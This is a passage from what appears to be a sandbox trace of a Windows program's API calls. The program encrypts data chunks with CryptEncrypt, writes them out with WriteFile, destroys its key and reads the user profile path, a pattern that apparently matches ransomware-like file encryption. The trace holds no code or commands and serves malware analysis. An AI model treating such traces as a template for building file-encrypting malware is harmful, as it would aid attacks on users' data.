dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0210.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.212] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xfe5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfe8) returned 1 [0210.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.213] CharLowerBuffW (in: lpsz="byte[4072]", cchLength=0xa | out: lpsz="byte[4072]") returned 0xa [0210.213] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.213] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.213] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.213] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.215] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9d910*, pdwDataLen=0x8cef60*=0xfe5, dwBufLen=0xfe8 | out: pbData=0x2a9d910*, pdwDataLen=0x8cef60*=0xfe8) returned 1 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.216] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.216] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.216] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.216] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.216] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.216] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.217] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.217] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.217] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.217] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.217] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aa28c0*, nNumberOfBytesToWrite=0xfe8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aa28c0*, lpNumberOfBytesWritten=0x8cf5e4*=0xfe8, lpOverlapped=0x0) returned 1 [0210.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.218] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.218] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.218] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.218] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.218] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.219] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab020, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.219] CryptDestroyKey (hKey=0x9e2138) returned 1 [0210.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.219] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.219] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.219] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.219] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.219] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.219] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.219] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.220] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.220] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.220] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.220] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.220] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.220] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.220] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.220] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.221] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.221] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.221] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.221] CryptReleaseContext (hProv=0xa7c110, dwFlags=0x0) returned 1 [0210.221] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.221] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.222] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.222] CloseHandle (hObject=0x520) returned 1 [0210.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.223] CloseHandle (hObject=0x4dc) returned 1 [0210.224] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.224] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.224] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0210.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.226] RtlAllocateHeap 